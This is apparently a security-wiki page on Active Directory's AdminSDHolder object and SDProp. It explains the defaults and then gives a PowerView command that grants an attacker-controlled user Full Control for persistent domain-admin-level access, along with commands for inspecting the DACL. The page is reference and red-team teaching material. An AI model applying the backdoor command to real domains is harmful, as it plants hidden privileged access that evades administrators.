AdminSDHolder

Theory

AdminSdHolder protects domain objects against permission changes. "AdminSdHolder" either refers to a domain object, a "worker code" or an operation depending on the context.
The operation consists in the PDC (Principal Domain Controller) Emulator restoring pre-set permissions for high-privilege users every 60 minutes.
The operation is conducted by a "worker code" called SDProp (Security Descriptor propagator).
SDProp propagates AdminSdHolder's DACL to every protected object every 60 minutes if their DACL is different.
The AdminSdHolder object is located at CN=AdminSdHolder,CN=SYSTEM,DC=DOMAIN,DC=LOCAL. The default AdminSdHolder object's DACL is the following.
  • Authenticated Users: Read
  • SYSTEM: Full Control
  • Administrators: Modify
  • Domain Admins: Modify
  • Enterprise Admins: Modify
The default protected objects are the following.
  • members (possibly nested) of the following groups: Account Operators, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, Server Operators
  • the following users: Administrator, krbtgt
When talking about AdminSdHolder, the AdminCount attribute is usually mentioned. This attribute is automatically set on an object when adding it to a protected group. Originally, the purpose was to improved SDProp's performance. AdminCount cannot be used for malicious purposes and is now mainly informative.

Practice

Once sufficient privileges are obtained, attackers can abuse AdminSdHolder to get persistence on the domain by modifying the object's DACL.
Let's say an attackers adds the following ACE to AdminSdHolder's DACL: attackercontrolleduser: Full Control.
At the next run of SDProp, attackercontrolleduser will have a GenericAll privilege over all protected objects (Domain Admins, Domain Controllers, and so on).
This can be done in PowerShell with Add-DomainObjectAcl from PowerSploit's PowerView module.
1
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,CN=DOMAIN,CN=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All
Copied!
AdminSdHolder's DACL can be inspected with Get-DomainObjectAcl as well.
1
# Inspect all AdminSdHolder's DACL
2
Get-DomainObjectAcl -SamAccountName "AdminSdHolder" -ResolveGUIDs
3
โ€‹
4
# Inspect specific rights an object has on AdminSdHolder (example with a user)
5
sid = Get-DomainUser "someuser" | Select-Object -ExpandProperty objectsid
6
Get-DomainObjectAcl -SamAccountName "AdminSdHolder" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq $sid}
Copied!

Resources

Sneaky Active Directory Persistence #15: Leverage AdminSDHolder & SDProp to (Re)Gain Domain Admin Rights
Active Directory Security
Five common questions about AdminSdHolder and SDProp
docsmsft
Backdooring AdminSDHolder for Persistence
Red Teaming Experiments
Last modified 1mo ago
Copy link
Edit on GitHub